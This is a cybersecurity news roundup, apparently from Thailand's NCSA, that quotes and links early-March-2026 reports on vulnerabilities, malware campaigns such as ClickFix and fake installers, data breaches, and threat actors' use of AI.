  "In the last quarter of 2025, information security researchers published numerous interesting reports on attacks against industrial organizations. Most of them highlight the persistence of long-standing problems: untimely installation of security updates, including on internet-accessible systems; insecure provision of remote access to internal systems; the difficulty of monitoring the security of trusted partners and suppliers; the inability to guarantee 100% protection for traditional operating systems with their inherent information security issues (DLL hijacking, BYOVD, and malware); and the lack of staff preparedness to resist basic social engineering techniques."
  https://ics-cert.kaspersky.com/publications/reports/2026/03/06/apt-and-financial-attacks-on-industrial-organizations-in-q4-2025/

New Tooling

• Codex Security: Now In Research Preview
  "Today we’re introducing Codex Security, our application security agent. It builds deep context about your project to identify complex vulnerabilities that other agentic tools miss, surfacing higher-confidence findings with fixes that meaningfully improve the security of your system while sparing you from the noise of insignificant bugs."
  https://openai.com/index/codex-security-now-in-research-preview/
  https://thehackernews.com/2026/03/openai-codex-security-scanned-12.html

Vulnerabilities

• Critical Nginx UI Flaw CVE-2026-27944 Exposes Server Backups
  "A critical vulnerability in Nginx UI, tracked as CVE-2026-27944 (CVSS score of 9.8), allows attackers to download and decrypt full server backups without authentication. The flaw poses a serious risk to organizations exposing the management interface, potentially revealing sensitive configuration data, credentials, and encryption keys. “The /api/backup endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the X-Backup-Security response header.” reads the advisory. “This allows an unauthenticated attacker to download a full system backup containing sensitive data (user credentials, session tokens, SSL private keys, Nginx configurations) and decrypt it immediately.”"
  https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html
  https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762
• Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited
  "Exposure management company WatchTowr reports that a recent Cisco Catalyst SD-WAN vulnerability, initially exploited as a zero-day, is now being used more frequently by threat actors. The in-the-wild exploitation of four Cisco Catalyst SD-WAN vulnerabilities came to light in recent weeks. One of them is CVE-2026-20127, which had been exploited as a zero-day in combination with an older vulnerability, CVE-2022-20775, to bypass authentication, escalate privileges, and establish persistence on systems."
  https://www.securityweek.com/recent-cisco-catalyst-sd-wan-vulnerability-now-widely-exploited/

Malware

• InstallFix: How Attackers Are Weaponizing Malvertized Install Guides
  "There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system. But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions."
  https://pushsecurity.com/blog/installfix/
  https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/
• Cyberattacks And Unpredictable Targeting Remain An Iran Risk
  "Cyberattacks launched by Iranian nation-state hackers in reprisal for what the United States has codenamed Operation Epic Fury so far have been evident mainly in their absence. Whether the regime's military or intelligence forces have the inclination or ability to launch such attacks isn't clear. The country continues to operate in a near-total internet blackout initiated for reasons unknown at the start of hostilities by the United States and Israel on Feb. 28, monitoring firm Netblocks reported early Friday."
  https://www.bankinfosecurity.com/cyberattacks-unpredictable-targeting-remain-iran-risk-a-30930
• AI As Tradecraft: How Threat Actors Operationalize AI
  "Threat actors are operationalizing AI along the cyberattack lifecycle to accelerate tradecraft, abusing both intended model capabilities and jailbreaking techniques to bypass safeguards and perform malicious activity. As enterprises integrate AI to improve efficiency and productivity, threat actors are adopting the same technologies as operational enablers, embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations."
  https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/
  https://www.darkreading.com/threat-intelligence/north-korean-apts-ai-it-worker-scams
  https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/
  https://cyberscoop.com/microsoft-north-korea-ai-operations/
• Fake CleanMyMac Site Installs SHub Stealer And Backdoors Crypto Wallets
  "A convincing fake version of the popular Mac utility CleanMyMac is tricking users into installing malware. The site instructs visitors to paste a command into Terminal. If they do, it installs SHub Stealer, macOS malware designed to steal sensitive data including saved passwords, browser data, Apple Keychain contents, cryptocurrency wallets, and Telegram sessions. It can even modify wallet apps such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live so attackers can later steal the wallet’s recovery phrase."
  https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets
• Middle East Conflict Fuels Opportunistic Cyber Attacks
  "Threat actors often take advantage of major global events to fuel interest in their malicious activities. Zscaler ThreatLabz is diligently tracking a surge in cybercriminal activity that capitalizes on the elevated political climate in the Middle East. This increased malicious activity includes discoveries that are directly tied to the ongoing conflict, alongside other related findings."
  https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks
• Malware Brief: When The Supply Chain Becomes The Attack Surface
  "For a long time, defenders focused on hardening the perimeter: patch your systems, train your users, lock down your endpoints. But as supply-chain threats multiply, attackers are increasingly bypassing perimeter defenses and walking straight in through trusted software, services and dependencies. That’s what makes software supply‑chain attacks so effective. Instead of compromising one company at a time, threat actors target a single vendor, developer account or build system and let trust do the rest of the work for them."
  https://blog.barracuda.com/2026/03/05/malware-brief-supply-chain-attack-surface
  VOID#GEIST: Stealthy Multi-Stage Python Loader With Embedded Runtime Deployment, Startup * Persistence, And Fileless Early Bird APC Injection Into Explorer.exe
  "Securonix Threat Research analyzed a stealthy, multi-stage malware intrusion chain utilizing an obfuscated batch script (non.bat) to deliver multiple encrypted RAT shellcode payloads corresponding to XWorm, XenoRAT, and AsyncRAT. The script establishes persistence by deploying a secondary batch script (spol.bat) into the Windows Startup folder, stages a legitimate embedded Python runtime from python.org, and decrypts encrypted shellcode blobs (new.bin, pul.bin, xn.bin) at runtime using external XOR key material (a.json, p.json, n.json)."
  https://www.securonix.com/blog/voidgeist-stealthy-multi-stage-python-loader/
  https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html
• Microsoft Reveals ClickFix Campaign Using Windows Terminal To Deploy Lumma Stealer
  "Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command into it."
  https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
  https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html
  https://www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/
• Mobile Spyware Campaign Impersonates Israel's Red Alert Rocket Warning System
  "Acronis Threat Research Unit (TRU) has been actively monitoring malware campaigns and threat activity leveraging recent geopolitical developments across the Middle East and abusing these events to deliver malware to individuals. During our investigation, TRU identified a targeted campaign distributing a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications, aimed at Israeli individuals."
  https://www.acronis.com/en/tru/posts/mobile-spyware-campaign-impersonates-israels-red-alert-rocket-warning-system/
  https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/
  https://hackread.com/hackers-fake-red-alert-rocket-alert-app-spy-israel-users/
• An Investigation Into Years Of Undetected Operations Targeting High-Value Sectors
  "Since at least 2020, we have observed a cluster of activity targeting high-value organizations across South, Southeast and East Asia. The attacks focus on critical sectors such as aviation, energy, government, law enforcement, pharmaceutical, technology and telecommunications. Unit 42 is tracking this ongoing, previously undocumented activity as CL-UNK-1068. We designate the term UNK to clusters of activity whose affiliation with either nation-state or cybercrime activity we have not yet determined."
  https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/
• Dark Web Profile: APT41
  "APT41 stands out in the threat landscape because it doesn’t stick to a single playbook. It has been repeatedly linked to both cyber espionage and financially motivated cybercrime, sometimes running those missions side by side. That dual-track model, paired with exploit-driven access and long-dwell intrusions, makes APT41 a high-signal profile for defenders looking to understand how modern operations blend strategy, stealth, and scale."
  https://socradar.io/blog/dark-web-profile-apt41/
• Iranian APT Infrastructure In Focus: Mapping State-Aligned Clusters During Geopolitical Escalation
  "Tensions between the United States, Israel, and Iran have reached a critical point following a series of diplomatic breakdowns, which led to escalating military exchanges and proxy engagements across the Middle East. History has shown that when hostilities rise to this degree, cyber operations do not lag far behind kinetic activity. They precede it. These operations, whether infrastructure reconnaissance, pre-positioning, or network intrusion, are part of the operational groundwork of modern conflict. Disrupting communications and compromising critical systems can weaken response capabilities long before physical engagement begins. Iranian state-aligned actors have historically targeted energy, financial services, government networks, and defense-related organizations across the U.S., Israel, and allied regions."
  https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters
• OCRFix Botnet Hides C2 In BNB Smart Chain Contracts
  "OCRFix is a three-stage botnet that stores its C2 URLs inside BNB Smart Chain testnet smart contracts. Each stage queries a contract via JSON-RPC at runtime to get the current C2 domain. To rotate infrastructure, the author updates the contract storage with a single blockchain transaction. Every infected machine follows on next check-in. No binary update required. Initial access is ClickFix -- a fake CAPTCHA that walks the victim through opening Windows Run and pasting a PowerShell command the page has placed in their clipboard."
  https://www.derp.ca/research/ocrfix-etherhiding-botnet/
• Termite Ransomware Breaches Linked To ClickFix CastleRAT Attacks
  "Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor. Researchers at cyber-deception threat intelligence firm MalBeacon observed the hackers' actions in an emulated organization environment over a period of 12 days. Velvet Tempest, also tracked as DEV-0504, is a threat group that has been involved in ransomware attacks as an affiliate for at least five years."
  https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/

Breaches/Hacks/Leaks

• Cognizant TriZetto Breach Exposes Health Data Of 3.4 Million Patients
  "TriZetto Provider Solutions, a healthcare IT company that develops software and services used by health insurers and healthcare providers, has suffered a data breach that exposed the sensitive information of over 3.4 million people. The firm, which has been operating under the Cognizant umbrella since 2014, disclosed that it detected suspicious activity on a web portal on October 2, 2025, and launched an investigation with the help of external cybersecurity experts."
  https://www.bleepingcomputer.com/news/security/cognizant-trizetto-breach-exposes-health-data-of-34-million-patients/
• 2,622 Valid Certificates Exposed: A Google-GitGuardian Study Maps Private Key Leaks To Real-World Risk
  "When a private key leaks on GitHub or DockerHub, detecting it is easy. What's harder, sometimes impossible, is understanding its real-world impact. Unlike AWS keys or OpenAI tokens, which are tied to their respective service, a leaked private key is just a mathematical object without an obvious owner. Private keys are challenging to attribute at scale: they are used in many different contexts, ranging from SSH authentication to JWT signatures. When one leaks, where do you start assessing the impact? Among leaked private keys, those used in X.509 infrastructure are most critical. They authenticate web servers in HTTPS: a compromised key enables attackers to impersonate websites or intercept data. That's why GitGuardian partnered with Google's researchers to answer a deceptively simple question: what happens when private keys leak?"
  https://blog.gitguardian.com/certificates-exposed-a-google-gitguardian-study/
  https://hackread.com/certificates-fortune-500-gov-exposed-key-leaks/
• Transport For London Says 2024 Breach Affected 7M Customers, Not 5,000
  "Transport for London has confirmed that a 2024 breach exposed the data of more than 7 million people – a far larger crowd than the few thousand customers originally warned that their details might be at risk. The BBC reported on Friday that the 2024 intrusion into TfL's systems potentially gave attackers access to a database covering as many as 10 million customers who had interacted with the capital's transport network."
  https://www.theregister.com/2026/03/06/tfl_2024_breach_numbers/

General News

• Cyberattack On Mexico's Gov't Agencies Highlight AI Threat
  "For any cyber-defender continuing to deny the impact of AI on attacker efficiency, welcome to Exhibit A. Over the past few months, a small group of hacktivists compromised the computers and networks of at least nine Mexican government agencies, stealing more than 195 million identities and tax records, along with vehicle registrations and more than 2.2 million property records, startup Gambit Security stated in a blog post this week that detailed the attack."
  https://www.darkreading.com/application-security/cyberattack-mexico-government-ai-threat
• Backup Strategies Are Working, And Ransomware Gangs Are Responding With Data Theft
  "Business email compromise (BEC) and funds transfer fraud combined for 58% of all cyber insurance claims filed in 2025, according to data from Coalition covering more than 100,000 policyholders across the United States, Canada, the United Kingdom, Australia, and Germany. BEC was the single most common claim type at 31%, with frequency rising 15% year over year to 0.47%. Average losses per BEC incident dropped 28% to $27,000, a decline attributed to faster detection and response by affected organizations."
  https://www.helpnetsecurity.com/2026/03/06/cyber-claims-report-ransomware-gangs-data-theft/
• What Happens When AI Teams Compete Against Human Hackers
  "A cybersecurity competition produced what may be the largest controlled dataset comparing AI-augmented teams to human-only teams on professional-grade offensive security tasks. The event, called NeuroGrid, ran for 72 hours on the Hack The Box platform and drew 1,337 registered human-only teams and 156 registered AI-agent teams competing across 36 challenges in nine security domains at four difficulty levels. AI teams operated through Model Context Protocol with human oversight in the loop. The analysis covers 958 human teams and 120 AI-agent teams that each attempted at least one challenge."
  https://www.helpnetsecurity.com/2026/03/06/cybersecurity-competition-ai-vs-human-hackers/
• Exploits And Vulnerabilities In Q4 2025
  "The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately. In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025."
  https://securelist.com/vulnerabilities-and-exploits-in-q4-2025/119105/
• Viral AI, Invisible Risks: What OpenClaw Reveals About Agentic Assistants
  "The name OpenClaw might not immediately be recognizable, partly because it has undergone several name changes, from Clawdbot to Moltbot, then finally to OpenClaw. Yet one thing is certain: This new digital assistant feels genuinely groundbreaking. It remembers past interactions, keeps data on the user’s device, and adapts to individual preferences, making it feel like a leap in capabilities reminiscent of the first ChatGPT release. At the same time, its development is not without caveats, as there have been media headlines that warn of its potential as a security nightmare."
  https://www.trendmicro.com/en_us/research/26/b/what-openclaw-reveals-about-agentic-assistants.html
• AI Agents Now Help Attackers, Including North Korea, Manage Their Drudge Work
  "AI agents allow cybercriminals and nation-state hackers to outsource the "janitorial-type work" needed to plan and carry out cyberattacks, according to Sherrod DeGrippo, Microsoft's GM of global threat intelligence. North Korea is taking advantage. This includes tasks such as performing reconnaissance on compromised computers, and standing up and managing attack infrastructure - which may not sound as thrilling as plotting and carrying out digital intrusions, but are real-world criminal use cases for agentic AI that should make threat hunters sit up and take notice."
  https://www.theregister.com/2026/03/08/deploy_and_manage_attack_infrastructure/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

Vulnerabilities

• Cisco Flags More SD-WAN Flaws As Actively Exploited In Attacks
  "Cisco has flagged two Catalyst SD-WAN Manager security flaws as actively exploited in the wild, urging administrators to upgrade vulnerable devices. Catalyst SD-WAN Manager (formerly vManage) is network management software that enables admins to monitor and manage up to 6,000 Catalyst SD-WAN devices from a single centralized dashboard. "In March 2026, the Cisco PSIRT became aware of active exploitation of the vulnerabilities that are described in CVE-2026-20128 and CVE-2026-20122 only," the company warned in an update to a February 25 advisory."
  https://www.bleepingcomputer.com/news/security/cisco-flags-more-sd-wan-flaws-as-actively-exploited-in-attacks/
  https://www.securityweek.com/cisco-warns-of-more-catalyst-sd-wan-flaws-exploited-in-the-wild/
  https://www.helpnetsecurity.com/2026/03/05/cisco-cve-2026-20128-cve-2026-20122-exploited/
• User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation Via Membership Registration
  "The User Registration & Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to improper privilege management in all versions up to, and including, 5.1.2. This is due to the plugin accepting a user-supplied role during membership registration without properly enforcing a server-side allowlist. This makes it possible for unauthenticated attackers to create administrator accounts by supplying a role value during membership registration."
  https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-512-unauthenticated-privilege-escalation-via-membership-registration
  https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/
• ContextCrush Flaw Exposes AI Development Tools To Attacks
  "A critical vulnerability affecting the Context7 MCP Server, a widely used tool for delivering documentation to AI coding assistants, has been disclosed by security researchers. The issue, dubbed ContextCrush, could allow attackers to inject malicious instructions into AI development tools through a trusted documentation channel. The flaw was discovered by Noma Labs researchers in the Context7 platform operated by Upstash. Context7 is used by developers to provide AI assistants such as Cursor, Claude Code and Windsurf with up-to-date library documentation directly inside integrated development environments."
  https://www.infosecurity-magazine.com/news/contextcrush-ai-development-tools/
• CISA Adds Five Known Exploited Vulnerabilities To Catalog
  "CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
  CVE-2017-7921 Hikvision Multiple Products Improper Authentication Vulnerability
  CVE-2021-22681 Rockwell Multiple Products Insufficient Protected Credentials Vulnerability
  CVE-2021-30952 Apple Multiple Products Integer Overflow or Wraparound Vulnerability
  CVE-2023-41974 Apple iOS and iPadOS Use-After-Free Vulnerability
  CVE-2023-43000 Apple Multiple products Use-After-Free Vulnerability"
  https://www.cisa.gov/news-events/alerts/2026/03/05/cisa-adds-five-known-exploited-vulnerabilities-catalog

Malware

• UAT-9244 Targets South American Telecommunication Providers With Three New Malware Implants
  "AT-9244 used dynamic-link library (DLL) side-loading to activate multiple stages of their infection chain. The actor executed “wsprint[.]exe”, a benign executable that loaded the malicious DLL-based loader “BugSplatRc64[.]dll”. The DLL reads a data file named “WSPrint[.]dll” from disk, decrypts its contents, and executes them in memory to activate TernDoor, the final payload. TernDoor is a variant of CrowDoor, a backdoor deployed in recent intrusions linked to China-nexus APTs such as FamousSparrow and Earth Estries. CrowDoor is a variant of SparrowDoor, another backdoor attributed to FamousSparrow. CrowDoor has also been observed in previous Tropic Trooper intrusions, indicating a close operational relationship with FamousSparrow."
  https://blog.talosintelligence.com/uat-9244/
  https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/

• ClipXDaemon: Autonomous X11 Clipboard Hijacker Delivered Via Bincrypter-Based Loader
  "In early February 2026, Cyble Research & Intelligence Labs (CRIL) identified a new Linux malware strain delivered through a loader structure previously associated with ShadowHS activity. While ShadowHS samples deployed post-exploitation tooling, the newly observed payload is operationally different. We have named it ClipXDaemon, an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments."
  https://cyble.com/blog/clipxdaemon-autonomous-x11-clipboard-hijacker/

• New BoryptGrab Stealer Targets Windows Users Via Deceptive GitHub Pages
  "We recently found the existence of a new stealer binary that collects browser and cryptocurrency wallet data, system information, and common files, among others. We designated this new stealer BoryptGrab. Certain variants of the stealer can download a PyInstaller backdoor, which we refer to as TunnesshClient. TunnesshClient establishes a reverse Secure Shell (SSH) tunnel to enable comunication with the attacker."
  https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html

• Bing AI Promoted Fake OpenClaw GitHub Repo Pushing Info-Stealing Malware
  "Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing’s AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware. OpenClaw is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. It has access to local files and can integrate with email, messaging apps, and online services. Due to its widespread local access, threat actors saw an opportunity to collect sensitive information by publishing malicious skills (instruction files) on the tool's official registry and GitHub."
  https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/

• Wikipedia Hit By Self-Propagating JavaScript Worm That Vandalized Pages
  "The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis. Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages. Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes."
  https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/

• APT36: A Nightmare Of Vibeware
  "Pakistan-based threat actor APT36, also known as Transparent Tribe, has pivoted from off-the-shelf malware to "vibeware", an AI-driven development model that produces a high-volume, mediocre mass of implants. Using niche languages like Nim, Zig, and Crystal, the actor seeks to evade standard detection engines while leveraging trusted cloud services, including Slack, Discord, Supabase, and Google Sheets, for command and control."
  https://businessinsights.bitdefender.com/apt36-nightmare-vibeware
  https://www.darkreading.com/cyberattacks-data-breaches/nation-state-actor-ai-malware-assembly-line
  https://www.bankinfosecurity.com/nation-state-hackers-play-vibes-a-30920
  https://hackread.com/pakistan-apt36-indian-govt-networks-ai-vibeware/

• Seedworm: Iranian APT On Networks Of U.S. Bank, Airport, Software Company
  "The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region. A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity."
  https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us
  https://www.theregister.com/2026/03/05/mudywater_backdoor_us_networks/

• FBI Targeted With ‘suspicious’ Activity On Its Networks
  "The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details. “The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”"
  https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/

• LIMINAL PANDA: China’s Emerging Espionage Threat In The Semiconductor And Technology Sectors
  "LIMINAL PANDA, a suspected China-nexus cyber-espionage actor, has recently emerged as an active player in the global threat landscape. The group began operating around 2020 and has focused its intelligence collection on a range of high-value targets in East Asia, Southeast Asia, and Western nations engaged in research and development of advanced technologies, including semiconductors, defense technologies, and telecommunications. While not a well-known actor (yet) like APT41 or Mustang Panda, LIMINAL PANDA shows an accelerating trajectory of evolution in capabilities, experimenting with the convergence of more traditional phishing criminal enterprises with sophisticated cloud exploitation and supply chain compromise."
  https://brandefense.io/blog/liminal-panda-apt-group/

• Breaches/Hacks/Leaks

• New Jersey County Says Malware Attack Took Down Phone Lines, IT Systems
  "One of the largest counties in New Jersey is dealing with a cyberattack that disrupted the phone lines and IT systems used across government offices. Passaic County, home to nearly 600,000 people in Northern New Jersey, published a statement on Wednesday evening warning residents that it is aware of a “malware attack” affecting county IT systems and phone lines. “Our team is actively working with federal and state officials to investigate and contain the issue,” the county said."
  https://therecord.media/new-jersey-county-says-malware-attack-took-down-phones

General News

• Phobos Ransomware Admin Pleads Guilty To Wire Fraud Conspiracy
  "A Russian national pleaded guilty to a wire fraud conspiracy charge related to his role in administering the Phobos ransomware operation, which breached hundreds of victims worldwide. Phobos is a long-running ransomware-as-a-service (RaaS) operation linked to the Crysis ransomware family. Phobos has been widely distributed through many affiliates, accounting for roughly 11% of all submissions to the ID Ransomware service between May 2024 and November 2024. The U.S. Department of Justice says the ransomware gang has collected ransom payments worth more than $39 million million from over 1,000 public and private entities worldwide."
  https://www.bleepingcomputer.com/news/security/phobos-ransomware-admin-pleads-guilty-to-wire-fraud-conspiracy/
  https://therecord.media/phobos-ransomware-leader-facing-20-years
  https://www.securityweek.com/russian-ransomware-operator-pleads-guilty-in-us/
  https://cyberscoop.com/phobos-ransomware-leader-guilty/
  https://securityaffairs.com/188984/security/phobos-ransomware-admin-faces-up-to-20-years-after-guilty-plea.html
• LatAm Now Faces 2x More Cyberattacks Than US
  "Nowhere in the world has cyber threat activity been growing faster than in Latin America, thanks in part to relatively rapid digital adoption on the part of businesses in the region, combined with relatively stagnant cybersecurity growth. Last year, researchers at Check Point tracked a 53% year-over-year rise in weekly cyberattacks in Latin America, and as of 2026, they confirmed it to be the most heavily targeted region on the planet."
  https://www.darkreading.com/threat-intelligence/latam-2x-more-cyberattacks-us
• That Attractive Online Ad Might Be a Malware Trap
  "Malware increasingly travels through the infrastructure that delivers online advertising. The Media Trust’s Global Report on Digital Trust, Ad Integrity, and the Protection of People describes a digital ad ecosystem where scam campaigns, malicious redirects, and malware delivery appear alongside marketing traffic. The financial impact of these threats continues to grow. Estimated consumer and business losses in the United States tied to malware, scams, and ad-borne fraud exceeded $12.5 billion in 2025. Exposure also remains widespread among internet users. Seven in ten adults reported encountering a digital scam or phishing attempt during the previous 12 months."
  https://www.helpnetsecurity.com/2026/03/05/the-media-trust-ad-malware-risks-report/
• As AI Agents Start Making Purchases, Security Teams Must Rethink Risk
  "In this Help Net Security interview, Donald Kossmann, CTO at fintech company Chargebacks911, talks about the emerging security, fraud, and governance risks of “agentic commerce,” where AI agents can autonomously make purchasing decisions on behalf of users or organizations. He explains that as AI agents gain the ability to shop, negotiate prices, select suppliers, and execute transactions independently, traditional assumptions about digital commerce begin to break down."
  https://www.helpnetsecurity.com/2026/03/05/donald-kossmann-chargebacks911-agentic-commerce-security-risks/
• Look What You Made Us Patch: 2025 Zero-Days In Review
  "Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels."
  https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review
  https://www.bleepingcomputer.com/news/security/google-says-90-zero-days-were-exploited-in-attacks-last-year/
  https://therecord.media/google-says-90-zero-days-exploited-apt-spyware-vendors
  https://www.securityweek.com/google-half-of-2025s-90-exploited-zero-days-aimed-at-enterprises/
  https://www.theregister.com/2026/03/05/zero_day_attacks_enterprise_tech_record/
• 2026 Browser Data Reveals Major Enterprise Security Blind Spots
  "The 2026 State of Browser Security Report is now available, revealing how the browser has rapidly become the most critical and least protected control point in the enterprise. It also highlights 2025 as the tipping point when AI-native browsers shifted from experimental tools to mainstream business platforms. Over the past twelve months, the browser evolved from a gateway to SaaS into something far more powerful and far more complex. AI copilots became embedded directly into business applications. Standalone generative AI tools became daily work companions. And a new class of AI-enhanced browsers began reshaping how users search, summarize, write, code, and automate tasks."
  https://www.bleepingcomputer.com/news/security/2026-browser-data-reveals-major-enterprise-security-blind-spots/
• 62 People Indicted By Taiwanese Prosecutors Over Ties To Cyber Scam Company Prince Group
  "Prosecutors in Taipei indicted 62 people and 13 companies for their involvement in cyber scam operations organized throughout Asia by the Prince Group. The Taipei District Prosecutors Office initiated its investigation in October after Chen Zhi, the founder of the Prince Group, was indicted by U.S. prosecutors on money laundering charges."
  https://therecord.media/62-indicted-taiwan-prince-group-scams
• AI-Driven Insider Risk Now a “Critical Business Threat,” Report Warns
  "The risk of insider threats is on the rise and businesses are concerned about the cybersecurity implications of intentionally malicious or negligent employees, research by Mimecast has warned. According to the company’s State of Human Risk Report 2026, internal cybersecurity risk has grown across the board, to the extent that it should be treated as a “critical business threat.” In many cases, the additional insider risk is because of employees mishandling or actively abusing AI tools"
  https://www.infosecurity-magazine.com/news/ai-insider-risk-critical-business/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand